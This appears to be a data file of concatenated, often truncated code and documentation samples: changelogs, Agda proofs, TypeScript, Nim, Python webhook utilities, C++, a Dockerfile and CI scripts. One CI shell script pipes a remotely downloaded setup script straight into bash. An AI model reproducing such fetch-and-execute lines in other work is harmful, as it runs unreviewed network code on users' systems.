+"AHEAD\nALL\nANYWHERE\nAXS\nBEEGA\nBEYOND\nBIG\nBOARDS\nBRITISH\nCALVIN\nCHABUTON\nCHAXLIE\nCHOC\nCHOCOOLATE\nCHRISTMAS\nCOMFORTABLE\nCRACK\nCRUNCHY\nCTE\nDIANE\nDIFFERENT\nDINING\nEARNING\nEAUTY\nELIZABETH\nENTRANCE\nEPICENTRE\nEVELYN\nEXC\nEXCEPT\nEXODUS\nFAIRPRICE\nFEDEX\nFINE\nFLESHIMP\nFOODS\nFOR\nFOREVER\nFRESHLY\nGELS\nGGULDEN\nGIFTS\nGIRLS\nGRACIOUS\nGRAPHIC\nHAAGEN\nHABA\nHOUR\nINC\nJOINT\nKEEP\nKFC\nKIMMIC\nLUMI\nMAXMARA\nMEAL\nMEETS\nMPH\nNEXT\nOFFICE\nOPENING\nOPTIONS\nORGANI\nOWNDAYS\nPACIFIC\nPARAGON\nPARIS\nPART\nPEPERONI\nPRICE\nPURCHASES\nRAFFLES\nRDJ\nSACOOR\nSALON\nSAYOUR\nSEAS\nSIGN-UP\nSINCERE\nSIS\nSOON\nSPEND\nSPOON\nSPOT\nSSI\nSTAKE\nSTARS\nSUBWAY\nSUPPORT\nTALK\nTANUKI\nTAPE\nTIMBERLAND\nTODS\nTRANSIT\nTURNING\nUOB\nUPP\nWHEELOCK\nYOUR" +"== 0.7.6 [8/26/2014]\n\nNew:\n\n- Extended renderEach documentation [rprince]\n- Added bower.json file [mkoryak]\n\nFixed:\n\n- Indentation in README [crzidea]\n\n== 0.7.5 [2/22/2014]\n\nNew:\n\n- Allow for different selectors in the push location proxy and only bind them within the app's element [kevingessner]\n- Add AMD support to Handlebars [rikkert]\n- Allow template paths with query parameters [trengrj]\n- Allow JSON paths with query parameters [vicb]\n- Support for new Google Analytics [erpheus]\n- More documentation for contextMatchesOptions [PhilippSoehnlein]\n\nFixed:\n\n- Documentation for onComplete was formatted incorrectly [togakangaroo]\n- AMD issues [rikkert]\n- Hostname issues in IE [teelahti]\n- Clicking an element within a link that targets a different window should be ignored [dtretyakov]\n- Allow using jQuery in noConflict mode [vicb]\n- Test for console.log is broken in IE8 [CodeOtter]\n- When not passing a verb to `route`, the assignment of path is broken [luckydrq]\n\n== 0.7.4 [1/27/2013]\n\nFixed:\n\n- Hotfix for bad jshinting of form matching\n\n== 0.7.3 [1/27/2013]\n\nNew:\n\n- Support for asynchronous chained callbacks [deitch]\n- Make plugins AMD enabled [delrosario]\n- Mixpanel and kissmetrics plugins [jpgarcia]\n\nFixed:\n\n- Better target checking for links and forms [jamesarosen]\n- Changed $.live() to $.delegate() [smithkl42]\n\n== 0.7.2 [10/19/2012]" +"{-\n\nDefinition of a homogeneous pointed type, and proofs that pi, product, path, and discrete types are homogeneous\n\nPortions of this file adapted from Nicolai Kraus' code here:\n https://bitbucket.org/nicolaikraus/agda/src/e30d70c72c6af8e62b72eefabcc57623dd921f04/trunc-inverse.lagda\n\n-}\n{-# OPTIONS --cubical --no-import-sorts --safe #-}\nmodule Cubical.Foundations.Pointed.Homogeneous where\n\nopen import Cubical.Foundations.Prelude\nopen import Cubical.Foundations.Equiv\nopen import Cubical.Foundations.Isomorphism\nopen import Cubical.Foundations.Univalence\nopen import Cubical.Foundations.Path\nopen import Cubical.Data.Sigma\nopen import Cubical.Data.Empty as \u22a5\nopen import Cubical.Relation.Nullary\n\nopen import Cubical.Foundations.Pointed.Base\nopen import Cubical.Foundations.Pointed.Properties\nopen import Cubical.Structures.Pointed\n\nisHomogeneous : \u2200 {\u2113} \u2192 Pointed \u2113 \u2192 Type (\u2113-suc \u2113)\nisHomogeneous {\u2113} (A , x) = \u2200 y \u2192 Path (Pointed \u2113) (A , x) (A , y)\n\n\nisHomogeneousPi : \u2200 {\u2113 \u2113'} {A : Type \u2113} {B\u2219 : A \u2192 Pointed \u2113'}\n \u2192 (\u2200 a \u2192 isHomogeneous (B\u2219 a)) \u2192 isHomogeneous (\u03a0\u1d58\u2219 A B\u2219)\nisHomogeneousPi h f i = (\u2200 a \u2192 typ (h a (f a) i)) , (\u03bb a \u2192 pt (h a (f a) i))\n\nisHomogeneousProd : \u2200 {\u2113 \u2113'} {A\u2219 : Pointed \u2113} {B\u2219 : Pointed \u2113'}\n \u2192 isHomogeneous A\u2219 \u2192 isHomogeneous B\u2219 \u2192 isHomogeneous (A\u2219 \u00d7\u2219 B\u2219)\nisHomogeneousProd hA hB (a , b) i = (typ (hA a i)) \u00d7 (typ (hB b i)) , (pt (hA a i)" +"import { Model } from '@patternfly/react-topology';\nimport { TYPE_HELM_RELEASE } from './components/const';\nimport { TopologyDisplayFilterType, DisplayFilters } from '../topology-types';\nimport { isExpanded } from '../filters';\n\nexport const EXPAND_HELM_RELEASE_FILTER = 'helmGrouping';\n\nexport const getTopologyFilters = () => {\n return [\n {\n type: TopologyDisplayFilterType.expand,\n id: EXPAND_HELM_RELEASE_FILTER,\n label: 'Helm Releases',\n priority: 300,\n value: true,\n },\n ];\n};\n\nexport const applyHelmDisplayOptions = (model: Model, filters: DisplayFilters): string[] => {\n let found = false;\n const appliedFilters = [];\n const expanded = isExpanded(EXPAND_HELM_RELEASE_FILTER, filters);\n model.nodes.forEach((d) => {\n if (d.type === TYPE_HELM_RELEASE) {\n if (!found) {\n found = true;\n appliedFilters.push(EXPAND_HELM_RELEASE_FILTER);\n }\n d.collapsed = !expanded;\n }\n });\n return appliedFilters;\n};\n\nexport const applyDisplayOptions = () => applyHelmDisplayOptions;" +"= Contributing to the Tutorial\n\n== Contributing\n\nLike every other open source project, we gladly accept\ncontributions. Sections that need help have been marked with\nFIXMEs. All contributions will be duly credited in the credits page.\n\nThis document's source is maintained in a public git repo located at\nhttps://github.com/bravegnu/gnu-eprog To contribute to the project,\nfork the project on github and send in a pull request.\n\nThe document is written in\nhttp://www.methods.co.nz/asciidoc/[asciidoc], and converted to HTML\nusing the http://docbook.sourceforge.net/[docbook-xsl] stylesheets.\n\n * Fork this repo into your GitHub account.\n \n * Install required software, for Debian / Ubuntu, use the following command.\n+\n------\nsudo apt install asciidoc docbook libsaxon-java libxslthl-java imgsizer dia\n------\n+\n * Clone your repo.\n+\n------\ngit clone -o gh https://github.com/yourname/gnu-eprog\ncd gnu-eprog\n------\n+\n * Make your changes.\n \n * Push you changes with `git`. Do use desriptive comments in your\n commits.\n\n * Send pull request to `gnu-eprog` maintainer, to review your\n changes and merge them into `master` `gnu-eprog` branch." +"#\n#\n# Nim's Runtime Library\n# (c) Copyright 2015 Nim Contributors\n#\n# See the file \"copying.txt\", included in this\n# distribution, for details about the copyright.\n#\n\n## :Authors: Zahary Karadjov\n##\n## This module provides utilities for reserving a portions of the\n## address space of a program without consuming physical memory.\n## It can be used to implement a dynamically resizable buffer that\n## is guaranteed to remain in the same memory location. The buffer\n## will be able to grow up to the size of the initially reserved\n## portion of the address space.\n##\n## Unstable API.\n\nfrom os import raiseOSError, osLastError\n\ntemplate distance*(lhs, rhs: pointer): int =\n cast[int](rhs) - cast[int](lhs)\n\ntemplate shift*(p: pointer, distance: int): pointer =\n cast[pointer](cast[int](p) + distance)\n\ntype\n MemAccessFlags* = int\n\n ReservedMem* = object\n memStart: pointer\n usedMemEnd: pointer\n committedMemEnd: pointer\n memEnd: pointer\n maxCommittedAndUnusedPages: int\n accessFlags: MemAccessFlags\n\n ReservedMemSeq*[T] = object\n mem: ReservedMem\n\nwhen defined(windows):\n import winlean\n\n type\n SYSTEM_INFO {.final, pure.} = object\n u1: uint32\n dwPageSize: uint32\n lpMinimumApplicationAddress: pointer\n lpMaximumApplicationAddress: pointer\n dwActiveProcessorMask: ptr uint32\n dwNumberOfProcessors: uint32\n dwProcessorType: uint32\n dwAllocationGranularity: uint32\n wProcessorLevel: uint16\n wProcessorRevision: uint16\n\n proc getSystemInfo(lpSystemInfo: ptr SYSTEM_INFO) {.stdcall,\n dynlib: \"kernel32\", importc: \"GetSystemInfo\".}\n\n proc getAllocationGranularity: uint =\n var sysInfo: SYSTEM_INFO\n getSystemInfo(addr sysInfo)" +"\"\"\"\nUtils related to processing or registering for webhooks\n\nA model registers itself here if it wants to be in the list of processing\nfunctions for a particular webhook. Each processor will have the ability\nto modify the event object, access event data, and do what it needs to do\n\nregistrations are keyed by top-level event type (e.g. \"invoice\", \"customer\", etc)\nEach registration entry is a list of processors\nEach processor in these lists is a function to be called\nThe function signature is:\n <Event object>\n\nThere is also a \"global registry\" which is just a list of processors (as defined above)\n\nNOTE: global processors are called before other processors.\n\"\"\"\nimport functools\nimport itertools\nfrom collections import defaultdict\n\n__all__ = [\"handler\", \"handler_all\", \"call_handlers\"]\n\n\nregistrations = defaultdict(list)\nregistrations_global = list()\n\n# Legacy. In previous versions of Stripe API, all test events used this ID.\n# Check out issue #779 for more information.\nTEST_EVENT_ID = \"evt_00000000000000\"\n\n\ndef handler(*event_types):\n \"\"\"\n Decorator that registers a function as a webhook handler.\n\n Functions can be registered for event types (e.g. 'customer') or\n fully qualified event sub-types (e.g. 'customer.subscription.deleted').\n\n If an event type is specified, the handler will receive callbacks for\n ALL webhook events of that" +"#include <iostream>\n\nvoid TestUnsignedInt();\nvoid TestFloat();\n\nfloat modulus(const float a, const float b);\n\nint main(int argc, char *argv[])\n{\n TestFloat();\n \n return 0;\n}\n\nvoid TestUnsignedInt()\n{\n unsigned int divideBy = 5;\n unsigned int startWith = 21;\n \n std::cout << \"21/5 = \" << 21/5 << std::endl; // = 4\n std::cout << \"21%5 = \" << 21%5 << std::endl; // = 1\n}\n\nvoid TestFloat()\n{\n float divideBy = 5.0f;\n float startWith = 21.0f;\n \n //std::cout << \"21/5 = \" << startWith/divideBy << std::endl; // = 4\n //std::cout << \"21%5 = \" << startWith%divideBy << std::endl; // Can't do this!\n \n std::cout << \"21%5 = \" << modulus(startWith,divideBy) << std::endl; // = 1\n \n}\n\nfloat modulus(const float a, const float b)\n{\n int result = static_cast<int>( a / b );\n return a - static_cast<float>( result ) * b;\n}" +"# Set to linux or name of OS\nARG GO_OS\n\n# Set to arch name of your system\nARG GO_ARCH\n\n# Terraform Version\nARG TERRAFORM_VERSION=0.12.0\n\n# Grab the Terraform binary\nFROM hashicorp/terraform:$TERRAFORM_VERSION AS terraform\n\n# Grab the Terraform Libvirt Provider binary\nFROM provider-libvirt:v0.5.2-debian AS libvirt\n\n# Base Image\nFROM ubuntu:18.04\n\nARG GO_OS\nENV GO_OS=$GO_OS\nARG GO_ARCH\nENV GO_ARCH=$GO_ARCH\n\n# Set working directory\nWORKDIR /root/\n\n# Make Directory for Provider Binaries\nRUN mkdir -p /root/.terraform.d/plugins/${GO_OS}_${GO_ARCH}/\n\n# Copy binaries from containers\nCOPY --from=terraform /bin/terraform /bin/\nCOPY --from=libvirt /go/bin/terraform-provider-libvirt /root/.terraform.d/plugins/${GO_OS}_${GO_ARCH}/\n\n# Install Dependencies\n# libvirt0 is needed to run the provider. xsltproc needed to use XML/XSLT. mkisofs needed to use cloud init images\n# ca-certificates to avoid terraform init 509 error. openssh-client to talk to remote libvirt server\nRUN apt-get update \\\n && apt-get upgrade -y \\\n && apt-get install \\\n -y --no-install-recommends \\\n libvirt0 xsltproc mkisofs ca-certificates openssh-client \\\n && rm -rf /var/lib/apt/lists/*\n\n# Copy Terraform Files\n# COPY libvirt.tf /root/\n\n# Terraform commands\n# RUN terraform init\n\nENTRYPOINT /bin/bash" +"## Flapjack Changelog\n\n# 2.0.0 - 2016-02-08\n- No changes\n\n# 2.0.0rc1 - 2016-01-08\n- Feature: First release candidate for v2.0.\n- Feature: Added configurable recovery delay (@necula-01 and @ali-graham)\n\n# 2.0.0b1 - 2015-10-12\n- Feature: First beta release for v2.0.\n\n# 1.6.0rc3 - 2015-06-15\n- Chore/Bug?: SNS gateway improvements (@ali-graham)\n- Feature: add summary to rollup alerts #869 (@necula-01)\n- Bug: Fix notification rule regex matches #871 (@necula-01)\n\n# 1.6.0rc2 - 2015-05-14\n- Bug: Fix SNS query encoding and subject length #867 (@ali-graham, @xcxsxvx)\n- Chore: improve debug logging in pagerduty when looking for acks e44abd5 (@jessereynolds)\n\n# 1.6.0rc1 - 2015-05-13\n- Feature: use token authentication for pagerduty gateway #831 (@alperkokmen)\n- Feature: expose failure delays in web UI #849 (@jessereynolds)\n- Bug: performance improvement - fix usage of KEYS command for entity check names c57d3a5 (@ali-graham)\n- Bug: remove disabled checks from rollup calculations #843 (@ali-graham)\n- Bug: fall back to basic auth for pagerduty incidents api #853 (@jessereynolds)\n- Chore: pagerduty ack retrieval improvements #858 (@jessereynolds)\n\n# 1.5.0 - 2015-03-31\n- No changes\n\n# 1.5.0rc1 - 2015-03-30\n- Feature: Expose failure delay (#748) in JSONAPI check report status #827 (@Hobbsee)\n- Feature: Split up internal metrics api" +"# pylint: skip-file\n\n#- @A defines/binding ClassA\n#- ClassA.node/kind class\nclass A(object):\n #- @__init__ defines/binding FnInit\n #- @self defines/binding ArgSelf\n #- FnInit.node/kind function\n #- FnInit param.0 ArgSelf\n def __init__(self):\n #- @self ref ArgSelf\n #- @foo defines/binding AttrFoo\n self.foo = []\n\n def f(self, x):\n #- @foo ref AttrFoo\n self.foo[x] = 10\n\n\n## The attr can be initialised somewhere other than __init__\n\n#- @B defines/binding ClassB\n#- ClassB.node/kind class\nclass B(object):\n def f(self, x):\n #- @bar ref AttrBar\n self.bar[x]\n\n #- @init_bar defines/binding FnInitBar\n #- @self defines/binding ArgBSelf\n #- FnInitBar.node/kind function\n #- FnInitBar param.0 ArgBSelf\n def init_bar(self):\n #- @self ref ArgBSelf\n #- @bar defines/binding AttrBar\n self.bar = []\n return self\n\n ## Attribute accesses could span several lines\n def baz(self):\n (self.\n #- @init_bar ref FnInitBar\n init_bar()\n #- @bar ref AttrBar\n .bar)" +"#include \"cVectorManagerC.h\"\n\n\ncDataManager::cDataManager ( )\n{\n}\n\ncDataManager::~cDataManager ( )\n{\n ClearAll();\n}\n\nvoid cDataManager::ClearAll ( )\n{\n for (ListPtr pCheck = m_List.begin(); pCheck != m_List.end(); ++pCheck)\n {\n // Release the texture and texture name\n delete pCheck->second;\n }\n\n // Now clear the list\n m_List.clear();\n}\n\nbool cDataManager::Add ( BaseVector* pData, int iID )\n{\n // Attempt to insert\n ListInsertStatus s = m_List.insert( std::make_pair( iID, pData ) );\n\n // If insert fails due to already existing, replace instead\n if (!s.second)\n {\n delete s.first->second;\n s.first->second = pData;\n }\n\n\treturn true;\n}\n\nbool cDataManager::Delete ( int iID )\n{\n ListPtr p = m_List.find( iID );\n if (p != m_List.end())\n {\n delete p->second;\n m_List.erase( p );\n }\n\treturn true;\n}" +"#include \"propagator.hpp\"\n#include \"wave.hpp\"\n\nvoid Propagator::init_compatible() noexcept {\n std::array<int, 4> value;\n // We compute the number of pattern compatible in all directions.\n for (unsigned y = 0; y < wave_height; y++) {\n for (unsigned x = 0; x < wave_width; x++) {\n for (unsigned pattern = 0; pattern < patterns_size; pattern++) {\n for (int direction = 0; direction < 4; direction++) {\n value[direction] =\n static_cast<unsigned>(propagator_state[pattern][get_opposite_direction(direction)]\n .size());\n }\n compatible.get(y, x, pattern) = value;\n }\n }\n }\n}\n\nvoid Propagator::propagate(Wave &wave) noexcept {\n\n // We propagate every element while there is element to propagate.\n while (propagating.size() != 0) {\n\n // The cell and pattern that has been set to false.\n unsigned y1, x1, pattern;\n std::tie(y1, x1, pattern) = propagating.back();\n propagating.pop_back();\n\n // We propagate the information in all 4 directions.\n for (unsigned direction = 0; direction < 4; direction++) {\n\n // We get the next cell in the direction direction.\n int dx = directions_x[direction];\n int dy = directions_y[direction];\n int x2, y2;\n if (periodic_output) {\n x2 = ((int)x1 + dx + (int)wave.width) % wave.width;\n y2 = ((int)y1 + dy + (int)wave.height) % wave.height;\n } else {\n x2 = x1 + dx;\n y2 = y1 + dy;\n if (x2 < 0 || x2 >= (int)wave.width)" +"#!/usr/bin/env bash\nset -evx\n\nif [ \"$TARGET\" = \"Scala.JS\" ]; then\n sbt scala212 \\\n js/compile \\\n js/test:compile \\\n coreJS/fastOptJS \\\n cacheJS/fastOptJS \\\n testsJS/test:fastOptJS \\\n js/test:fastOptJS \\\n js/test\nelif [ \"$TARGET\" = \"ScalaNative\" ]; then\n curl -f https://raw.githubusercontent.com/scala-native/scala-native/master/scripts/travis_setup.sh | bash -x\n\n sbt scala212 \\\n launcher-native_03/publishLocal \\\n launcher-native_040M2/publishLocal \\\n cli/pack\n\n modules/cli/target/pack/bin/coursier bootstrap \\\n -S \\\n -o native-echo \\\n io.get-coursier:echo_native0.3_2.11:1.0.1\n\n if [ \"$(./native-echo -n foo a)\" != \"foo a\" ]; then\n echo \"Error: unexpected output from native test bootstrap.\" 1>&2\n exit 1\n fi\nelif [ \"$TARGET\" = \"Website\" ]; then\n amm-runner website.sc generate\nelse\n sbt scalaFromEnv \\\n jvmProjects/compile \\\n jvmProjects/test:compile\n\n if [ \"$(uname)\" == \"Darwin\" ]; then\n IT=\"testsJVM/it:test\" # doesn't run proxy-tests in particular\n else\n IT=\"jvmProjects/it:test\"\n fi\n\n ./scripts/with-redirect-server.sh \\\n ./modules/tests/handmade-metadata/scripts/with-test-repo.sh \\\n sbt scalaFromEnv jvmProjects/test \"$IT\"\n\n sbt scalaFromEnv evictionCheck compatibilityCheck\nfi" +"id: 902\ntitle: \"What's a sandbox?\"\nsummary:\ncontent: |\n A \"sandbox\" is your personal wiki page where you can practice editing, plan\n out work, draft articles, or just experiment, without impacting the\n article \"mainspace\u201d on Wikipedia\u2014which is what we call live articles.\n\n To go to your default sandbox page, simply click the sandbox link, which can\n be found at the top right whenever you are logged in at *en.wikipedia.org*.\n\n Think of your sandbox as a replica of a blank Wikipedia article. All of the\n same tools are available for you to use.\n\n Anyone can still see your sandbox, so it's important that the content you put\n there isn't something you don't want people to see.\n\n Do not copy and paste things there that might violate copyright rules." +".\\\" $FreeBSD$\n.\\\" $MCom: portlint/portlint.1,v 1.14 2020/05/30 13:03:55 jclarke Exp $\n.\\\"\n.\\\" Copyright (c) 1997 by Jun-ichiro Hagino <itojun@itojun.org>.\n.\\\" All Rights Reserved. Absolutely no warranty.\n.\\\"\n.Dd April 1, 2010\n.Dt PORTLINT 1\n.Os\n.Sh NAME\n.Nm portlint\n.Nd a verifier for port directories\n.Sh SYNOPSIS\n.Nm portlint\n.Op Fl abcghvtACNV\n.Op Fl M Ar ENV\n.Op Fl B Ar n\n.Op Ar dir\n.Sh DESCRIPTION\n.Nm\ntries to verify the content of a port directory.\nThe purpose of\n.Nm\ncan be separated into two parts:\n.Pq 1\nto let the submitters easily polish their own port directory, and\n.Pq 2\nto decrease the labor of the committers.\n.Pp\n.Nm\nuses very simple regular-expression matching for verifying\nfiles that make up a port directory.\nNote that it does NOT implement a complete parser for those files.\nBecause of this the user may see some extra warnings,\nespecially when checking complex\n.Pa Makefile Ns No s .\n.Pp\n.Sy Options\n.Bl -tag -width Fl\n.It Fl a\nPerform additional checks for extra files, such as\n.Pa scripts/*\nand\n.Pa pkg-* .\n.It Fl b\nWarn the use of\n.Pa $(VARIABLE) .\nSome of the committers prefer\n.Pa ${VARIABLE}\ninstead" +"/**\n * @file\n */\n\n#pragma once\n\n#include \"tb_widgets_common.h\"\n\nnamespace tb {\n\n/** TBToggleContainer is a widget that toggles a property when its value\n\tchange between 0 and 1. TOGGLE specifies what property will toggle.\n\tThis is useful f.ex to toggle a whole group of child widgets depending\n\ton the value of some other widget. By connecting the TBToggleContainer\n\twith a widget connection, this can happen completly automatically. */\nclass TBToggleContainer : public TBWidget {\npublic:\n\t// For safe typecasting\n\tTBOBJECT_SUBCLASS(TBToggleContainer, TBWidget);\n\n\tTBToggleContainer();\n\n\t/** Defines what should toggle when the value changes. */\n\tenum TOGGLE {\n\t\tTOGGLE_NOTHING, ///< Nothing happens (the default)\n\t\tTOGGLE_ENABLED, ///< Enabled/disabled state\n\t\tTOGGLE_OPACITY, ///< Opacity 1/0\n\t\tTOGGLE_EXPANDED ///< Expanded/collapsed (In parent axis direction)\n\t};\n\n\t/** Set what should toggle when the value changes. */\n\tvoid setToggle(TOGGLE toggle);\n\tTOGGLE getToggle() const {\n\t\treturn m_toggle;\n\t}\n\n\t/** Set if the toggle state should be inverted. */\n\tvoid setInvert(bool invert);\n\tbool getInvert() const {\n\t\treturn m_invert;\n\t}\n\n\t/** Get the current value, after checking the invert mode. */\n\tbool getIsOn() const {\n\t\treturn m_invert ? m_value == 0 : !(m_value == 0);\n\t}\n\n\t/** Set the value of this widget. 1 will turn on the toggle, 0 will turn it" +"graph [\n node_count 115\n edge_count 228\n\n node_data size float\n node_data label string\n\n node [\n id 1\n degree 2\n size 1\n label \"waiting_P3\"\n ]\n node [\n id 2\n degree 2\n size 1\n label \"releasing_P3\"\n ]\n node [\n id 3\n degree 2\n size 1\n label \"init_P3\"\n ]\n node [\n id 4\n degree 2\n size 1\n label \"ready_to_consume\"\n ]\n node [\n id 5\n degree 2\n size 1\n label \"ready_to_receive\"\n ]\n node [\n id 6\n degree 2\n size 1\n label \"waiting_P2\"\n ]\n node [\n id 7\n degree 2\n size 1\n label \"releasing_P2\"\n ]\n node [\n id 8\n degree 2\n size 1\n label \"init_P2\"\n ]\n node [\n id 9\n degree 2\n size 1\n label \"waiting_P1\"\n ]\n node [\n id 10\n degree 2\n size 1\n label \"releasing_P1\"\n ]\n node [\n id 11\n degree 2\n size 1\n label \"init_P1\"\n ]\n node [\n id 12\n degree 2\n size 1\n label \"ready_to_send\"\n ]\n node [\n id 13\n degree 2\n size 1\n label \"ready_to_produce\"\n ]\n node [\n id 14\n degree 6\n size 1\n label \"ext_P1\"\n ]\n node [\n id 15\n degree 4\n size 1\n label \"norm_P1\"\n ]\n node [\n id 16\n degree 6\n size 1\n label \"basic_P1\"\n ]\n node [\n id 17\n degree 4\n size 1\n label \"R2_off_P1\"\n ]\n node" +"package org.highj.data.ord;\n\nimport org.highj.data.Maybe;\nimport org.highj.typeclass0.group.Group;\n\nimport java.util.function.Supplier;\n\n/**\n * The result of a comparison: LT (less than), EQ (equal) or GT (greater than)\n */\npublic enum Ordering {\n LT, EQ, GT;\n\n /**\n * Converts the {@link Ordering} to a number which can be used like the result of a\n * {@link Comparable} or {@link java.util.Comparator}.\n *\n * @return the int value\n */\n public int cmpResult() {\n return ordinal() - 1;\n }\n\n /**\n * Compares first by this and then (if necessary) by the given argument.\n *\n * @param that the {@link Ordering} to be used if this one is EQ\n * @return the combined result\n */\n public Ordering andThen(Ordering that) {\n return this == EQ ? that : this;\n }\n\n /**\n * Compares first by this and then (if necessary) by comparing the given arguments.\n *\n * @param x the first comparison argument\n * @param y the second comparison argument\n * @return the combined result\n */\n public Ordering andThen(boolean x, boolean y) {\n return this == EQ ? Ordering.compare(x, y) : this;\n }\n\n /**\n * Compares first by this and then (if necessary) by comparing the given arguments.\n *\n * @param x the first comparison argument\n * @param y" +"package config\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"os\"\n\t\"strings\"\n\t\"text/tabwriter\"\n\t\"time\"\n\n\t\"github.com/inbucket/inbucket/pkg/stringutil\"\n\t\"github.com/kelseyhightower/envconfig\"\n)\n\nconst (\n\tprefix = \"inbucket\"\n\ttableFormat = `Inbucket is configured via the environment. The following environment variables\ncan be used:\n\nKEY\tDEFAULT\tDESCRIPTION\n{{range .}}{{usage_key .}}\t{{usage_default .}}\t{{usage_description .}}\n{{end}}`\n)\n\nvar (\n\t// Version of this build, set by main\n\tVersion = \"\"\n\n\t// BuildDate for this build, set by main\n\tBuildDate = \"\"\n)\n\n// mbNaming represents a mailbox naming strategy.\ntype mbNaming int\n\n// Mailbox naming strategies.\nconst (\n\tUnknownNaming mbNaming = iota\n\tLocalNaming\n\tFullNaming\n\tDomainNaming\n)\n\n// Decode a naming strategy from string.\nfunc (n *mbNaming) Decode(v string) error {\n\tswitch strings.ToLower(v) {\n\tcase \"local\":\n\t\t*n = LocalNaming\n\tcase \"full\":\n\t\t*n = FullNaming\n\tcase \"domain\":\n\t\t*n = DomainNaming\n\tdefault:\n\t\treturn fmt.Errorf(\"Unknown MailboxNaming strategy: %q\", v)\n\t}\n\treturn nil\n}\n\n// Root contains global configuration, and structs with for specific sub-systems.\ntype Root struct {\n\tLogLevel string `required:\"true\" default:\"info\" desc:\"debug, info, warn, or error\"`\n\tMailboxNaming mbNaming `required:\"true\" default:\"local\" desc:\"Use local, full or domain addressing\"`\n\tSMTP SMTP\n\tPOP3 POP3\n\tWeb Web\n\tStorage Storage\n}\n\n// SMTP contains the SMTP server configuration.\ntype SMTP struct {\n\tAddr string `required:\"true\" default:\"0.0.0.0:2500\" desc:\"SMTP server IP4 host:port\"`\n\tDomain" +"/**\n * Requires the variable to be the right hand operator when doing a boolean comparison\n *\n * Types: `Array` or `Boolean`\n *\n * Values:\n * - `true` specifies that yoda conditions are required for most possible comparison operators\n * - `Array`: represents the list of quoted operators that requires yoda conditions\n *\n * #### Example\n *\n * ```js\n * \"requireYodaConditions\": true\n * ```\n * ```js\n * \"requireYodaConditions\": [\n * \"==\",\n * \"===\",\n * \"!=\",\n * \"!==\"\n * ]\n * ```\n *\n * ##### Valid for mode `true` or `['==']`\n * ```js\n * if (1 == a) {\n * return\n * }\n * ```\n *\n * ##### Invalid for mode `true` or `['==']`\n *\n * ```js\n * if (a == 1) {\n * return\n * }\n * ```\n */\n\nvar assert = require('assert');\n\nmodule.exports = function() {};\n\nmodule.exports.prototype = {\n\n configure: function(operators) {\n var isTrue = operators === true;\n\n assert(\n Array.isArray(operators) || isTrue,\n this.getOptionName() + ' option requires array or true value'\n );\n\n if (isTrue) {\n operators = ['==', '===', '!=', '!=='];\n }\n\n this._operatorIndex = {};\n for (var i = 0, l = operators.length; i < l; i++) {\n this._operatorIndex[operators[i]] = true;\n }\n },\n\n getOptionName: function() {\n return 'requireYodaConditions';\n }," +"# Sharing your project\n\nOnce you've made your project, you can save it the cloud, share it, or embed it on another website.\n\n* Click **More...**, then **Embed Project**:\n* Click **Publish project**. This will make the project publicly available\n* You will then see this information:\n\n## Sharing the URL\n\nYou can share the URL for the project with other people, and they will be able to visit that page to see your project, download it, or edit it. \n\n### ~hint\n\n**Developers:** This page supports [OEmbed](https://oembed.com/).\n\n### ~\n\n## Embedding into a blog or web site\n\nRather than just sharing the link, you can also embed the project so that your visitors can use the simulator, edit blocks or code, or download the project without having to leave your site.\n\n### General instructions\n\nSelect the kind of embedding you would like.\n\n* **Screenshot** - a lightweight screenshot of the blocks that links to the snippet\n* **Editor** - embedded editor with minimal UI\n* **Simulator** - embedded simulator only\n* **Command line** - specific instructions to unpack the project using the [command line](/cli) tools\n\nCopy the HTML for embedding the page from the publish dialog. It will look like" +"# Projects\n\nAs mentioned in the previous section, a project in Livekeys consists of one or more Qml files or components, out of\nwhich one is the main file or the one that's being executed. Livekeys treats these as 2 types of projects: file\nbased and folder based. The project directory can be accessed whithin qml, by using the\n`project.dir()` expression:\n\n```\nimport QtQuick 2.3\n\nText{\n text: 'Project path :' + project.dir()\n}\n```\n\nThis helps the access keep files relative to the project folder. For projects that have a single file, the\n`project.dir()` expression returns the path to the directory the file is located in.\n\nAs a rule within project based files, qml files that start with a capital letter are used as components within\nthat project folder, since they define new types, and files that start with a lowercase letter are mainly used for\nexecution like sample files, tests or main.qml files:\n\n```\n|- MyComponent.qml\n|- samples/myComponentUsage.qml\n|- tests/myComponentTest.qml\n|- main.qml\n```\n\n## Active Files\n\nWhen opening a project folder, Livekeys expects a similar structure to the above to be present. It will look to set\nthe active file automatically, by first looking for the main.qml, then looking" +"# utils ----\n#' @importFrom utils getAnywhere getFromNamespace\nget_fun <- function(x){\n if( grepl(\"::\", x, fixed = TRUE) ){\n coumpounds <- strsplit(x, split = \"::\", x, fixed = TRUE)[[1]]\n z <- getFromNamespace(coumpounds[2], ns = coumpounds[1] )\n } else {\n z <- getAnywhere(x)\n if(length(z$objs) < 1){\n stop(\"could not find any function named \", shQuote(z$name), \" in loaded namespaces or in the search path. If the package is installed, specify name with `packagename::function_name`.\")\n }\n }\n z\n}\n\nfile_with_meta_ext <- function(file, meta_ext, ext = tools::file_ext(file)) {\n paste(tools::file_path_sans_ext(file),\n \".\", meta_ext, \".\", ext,\n sep = \"\"\n )\n}\n\n# tables_default_values ----\ntables_default_values <- list(\n style = \"Table\",\n layout = \"autofit\",\n width = 1,\n caption = list(\n style = \"Table Caption\",\n pre = \"Table \", sep = \": \"\n ),\n conditional = list(\n first_row = TRUE,\n first_column = FALSE,\n last_row = FALSE,\n last_column = FALSE,\n no_hband = FALSE,\n no_vband = TRUE\n )\n)\n\n# plots_default_values ----\nplots_default_values <- list(\n style = \"Figure\",\n align = \"center\",\n caption = list(\n style = \"Image Caption\",\n pre = \"Figure \", sep = \": \"\n )\n)\n\n# lists_default_values ----\nlists_default_values <- list(\n ol.style = NULL,\n ul.style = NULL\n)\n\n# memoise reference_docx ----\n\n#' @importFrom officer get_reference_value\nget_docx_uncached <- function() {" +"Using Tutorial Data from Google Drive in Colab\n==============================================\n\nWe've added a new feature to tutorials that allows users to open the\nnotebook associated with a tutorial in Google Colab. You may need to\ncopy data to your Google drive account to get the more complex tutorials\nto work.\n\nIn this example, we'll demonstrate how to change the notebook in Colab\nto work with the Chatbot Tutorial. To do this, you'll first need to be\nlogged into Google Drive. (For a full description of how to access data\nin Colab, you can view their example notebook\n`here <https://colab.research.google.com/notebooks/io.ipynb#scrollTo=XDg9OBaYqRMd>`__.)\n\nTo get started open the `Chatbot\nTutorial <https://pytorch.org/tutorials/beginner/chatbot_tutorial.html>`__\nin your browser.\n\nAt the top of the page click **Run in Google Colab**.\n\nThe file will open in Colab.\n\nIf you choose, **Runtime** then **Run All**, you'll get an error as the\nfile 